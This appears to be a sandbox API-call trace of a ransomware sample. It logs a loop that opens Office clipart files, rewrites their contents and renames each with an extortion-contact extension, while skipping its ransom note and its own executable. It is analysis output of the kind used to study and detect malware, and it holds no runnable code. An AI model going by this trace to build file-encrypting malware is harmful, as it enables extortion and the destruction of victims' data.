(in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF") returned 69 [0170.283] wcscmp (_String1="SO01905_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.283] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01905_.WMF") returned 0x0 [0170.283] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF") returned 0x45 [0170.283] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01905_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.285] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x578, lpOverlapped=0x0) returned 1 [0170.292] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.292] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.292] _errno () returned 0x84b1160840 [0170.292] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.292] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x580, lpOverlapped=0x0) returned 1 [0170.292] CloseHandle (hObject=0x1a8) returned 1 [0170.292] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.292] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.292] __uncaught_exception () returned 0x84b1160800 [0170.292] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.293] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01905_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01905_.wmf.[evil@cock.lu].evil")) returned 1 [0170.293] ??_V@YAXPEAX@Z () returned 0x1 [0170.296] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF", dwFileAttributes=0x200) returned 0 [0170.296] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.296] wcsstr (_Str="SO01954_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.296] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF") returned 69 [0170.296] wcscmp (_String1="SO01954_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.296] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01954_.WMF") returned 0x0 [0170.296] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF") returned 0x45 [0170.296] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01954_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.298] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3086, lpOverlapped=0x0) returned 1 [0170.310] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.310] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.310] _errno () returned 0x84b1160840 [0170.311] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.311] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x30a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x30a0, lpOverlapped=0x0) returned 1 [0170.311] CloseHandle (hObject=0x1a8) returned 1 [0170.311] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.311] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.311] __uncaught_exception () returned 0x84b1160800 [0170.311] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.311] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01954_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01954_.wmf.[evil@cock.lu].evil")) returned 1 [0170.313] ??_V@YAXPEAX@Z () returned 0x1 [0170.315] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF", dwFileAttributes=0x200) returned 0 [0170.315] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.315] wcsstr (_Str="SO02009_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.315] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF") returned 69 [0170.315] wcscmp (_String1="SO02009_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.315] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02009_.WMF") returned 0x0 [0170.315] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF") returned 0x45 [0170.316] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02009_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.317] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d14, lpOverlapped=0x0) returned 1 [0170.324] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.324] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.324] _errno () returned 0x84b1160840 [0170.324] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.324] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1d20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1d20, lpOverlapped=0x0) returned 1 [0170.324] CloseHandle (hObject=0x1a8) returned 1 [0170.324] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.325] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.325] __uncaught_exception () returned 0x84b1160800 [0170.325] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.325] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02009_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02009_.wmf.[evil@cock.lu].evil")) returned 1 [0170.326] ??_V@YAXPEAX@Z () returned 0x1 [0170.329] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF", dwFileAttributes=0x200) returned 0 [0170.329] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.329] wcsstr (_Str="SO02022_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.329] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF") returned 69 [0170.329] wcscmp (_String1="SO02022_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.329] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02022_.WMF") returned 0x0 [0170.329] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF") returned 0x45 [0170.329] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02022_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.331] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d68, lpOverlapped=0x0) returned 1 [0170.338] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.338] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.338] _errno () returned 0x84b1160840 [0170.338] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.338] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1d80, lpOverlapped=0x0) returned 1 [0170.338] CloseHandle (hObject=0x1a8) returned 1 [0170.338] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.339] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.339] __uncaught_exception () returned 0x84b1160800 [0170.339] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.339] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02022_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02022_.wmf.[evil@cock.lu].evil")) returned 1 [0170.340] ??_V@YAXPEAX@Z () returned 0x1 [0170.342] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF", dwFileAttributes=0x200) returned 0 [0170.343] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.343] wcsstr (_Str="SO02024_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.343] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF") returned 69 [0170.343] wcscmp (_String1="SO02024_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.343] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02024_.WMF") returned 0x0 [0170.343] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF") returned 0x45 [0170.343] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02024_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.345] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x23a8, lpOverlapped=0x0) returned 1 [0170.352] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.352] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.352] _errno () returned 0x84b1160840 [0170.352] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.352] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x23c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x23c0, lpOverlapped=0x0) returned 1 [0170.352] CloseHandle (hObject=0x1a8) returned 1 [0170.352] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.352] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.352] __uncaught_exception () returned 0x84b1160800 [0170.352] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.353] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02024_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02024_.wmf.[evil@cock.lu].evil")) returned 1 [0170.353] ??_V@YAXPEAX@Z () returned 0x1 [0170.356] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF", dwFileAttributes=0x200) returned 0 [0170.356] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.356] wcsstr (_Str="SO02025_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.356] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF") returned 69 [0170.356] wcscmp (_String1="SO02025_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.356] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02025_.WMF") returned 0x0 [0170.356] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF") returned 0x45 [0170.356] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02025_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.358] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2016, lpOverlapped=0x0) returned 1 [0170.365] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.365] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.365] _errno () returned 0x84b1160840 [0170.365] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.365] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2020, lpOverlapped=0x0) returned 1 [0170.365] CloseHandle (hObject=0x1a8) returned 1 [0170.365] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.366] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.366] __uncaught_exception () returned 0x84b1160800 [0170.366] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.366] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02025_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02025_.wmf.[evil@cock.lu].evil")) returned 1 [0170.367] ??_V@YAXPEAX@Z () returned 0x1 [0170.369] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF", dwFileAttributes=0x200) returned 0 [0170.370] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.370] wcsstr (_Str="SO02028_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.370] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF") returned 69 [0170.370] wcscmp (_String1="SO02028_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.370] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02028_.WMF") returned 0x0 [0170.370] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF") returned 0x45 [0170.370] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02028_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.372] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x24c8, lpOverlapped=0x0) returned 1 [0170.379] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.379] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.379] _errno () returned 0x84b1160840 [0170.379] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.379] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x24e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x24e0, lpOverlapped=0x0) returned 1 [0170.379] CloseHandle (hObject=0x1a8) returned 1 [0170.379] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.379] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.379] __uncaught_exception () returned 0x84b1160800 [0170.379] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.380] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02028_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02028_.wmf.[evil@cock.lu].evil")) returned 1 [0170.380] ??_V@YAXPEAX@Z () returned 0x1 [0170.383] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF", dwFileAttributes=0x200) returned 0 [0170.383] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.383] wcsstr (_Str="SO02045_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.383] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 69 [0170.383] wcscmp (_String1="SO02045_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.383] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02045_.WMF") returned 0x0 [0170.383] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 0x45 [0170.383] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.386] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x266c, lpOverlapped=0x0) returned 1 [0170.594] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.594] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.594] _errno () returned 0x84b1160840 [0170.594] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.594] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2680, lpOverlapped=0x0) returned 1 [0170.594] CloseHandle (hObject=0x1a8) returned 1 [0170.594] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.595] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.595] __uncaught_exception () returned 0x84b1160800 [0170.595] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.595] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02045_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02045_.wmf.[evil@cock.lu].evil")) returned 1 [0170.596] ??_V@YAXPEAX@Z () returned 0x1 [0170.599] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF", dwFileAttributes=0x200) returned 0 [0170.599] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.599] wcsstr (_Str="SO02048_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.600] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF") returned 69 [0170.600] wcscmp (_String1="SO02048_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.600] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02048_.WMF") returned 0x0 